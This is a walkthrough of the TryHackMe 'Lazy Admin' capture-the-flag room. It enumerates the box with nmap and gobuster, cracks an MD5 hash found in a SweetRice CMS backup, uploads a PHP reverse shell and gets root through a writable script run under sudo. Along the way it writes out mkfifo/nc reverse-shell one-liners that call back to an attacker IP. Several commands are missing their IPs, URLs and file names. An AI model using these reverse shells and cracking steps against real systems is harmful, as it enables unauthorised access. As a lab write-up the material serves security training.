Lazy Admin

In this post, we will look into the room “Lazy Admin” from TryHackMe, which can be found on

user flag 1

echo machine-ip >> /etc/hosts


nmap -sC -sV -oN nmap.txt

Starting Nmap 7.80 ( ) at 2020-06-16 04:08 EDT
Nmap scan report for (
Host is up (0.26s latency).
Not shown: 998 closed ports
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
|   256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_  256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 38.82 seconds

We will run gobuster to enumerate the website

gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 35
Welcome to SweetRice - Thank your for install SweetRice as your website management system.
This site is building now , please come late.

If you are the webmaster,please go to Dashboard -> General -> Website setting

and uncheck the checkbox "Site close" to open your website.

More help at Tip for Basic CMS SweetRice installed
gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 35

we will see a folder named mysql_backup navigate to mysql_backup and download the file open the file using any text editor i use vim

14 => 'INSERT INTO `%--%_options` VALUES(\'1\',\'global_setting\',\'a:17:{s:4:\\"name\\";s:25:\\"Lazy Admin's Website\\";s:6:\\"author\\";s:10:\\"Lazy Admin\\";s:5:\\"title\\";s:0:\\"\\";s:8:\\"keywords\\";s:8:\\"Keywords\\";s:11:\\"description\\";s:11:\\
<p>Welcome to SweetRice - Thank your for install SweetRice as your website management system.</p>
manager : 42f749ade7f9e195bf475f37a44cafcb(MD5)
echo 42f749ade7f9e195bf475f37a44cafcb > hash.txt
john --format=RAW-MD5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
manager : Password123

and enter the creds to login and navigate to media center and upload the reverse shell if you dont have you can download it from the link below after changing the ip address and renaming it to revshell.php5 we see the file is uploaded open terminal and execute this

nc -lnvp 4444

now click on the uploaded file and we got a shell

python -c 'import pty; pty.spawn("/bin/bash")'

enter these two commands to spawn a tty terminal move to /home/itguy

we got the user flag

root flag

Privilege Escalation

rice : randompass
system("sh", "/etc/");

this script executes another script /etc/

cat /etc/
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 5554 >/tmp/f

Luckily we can write into now all we need to do is insert a reverse shell

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your-ip> 5554" >/tmp/f >

open a new terminal and run this command

nc -lnvp 5554

then go victim shell and execute this command

sudo /usr/bin/perl /home/itguy/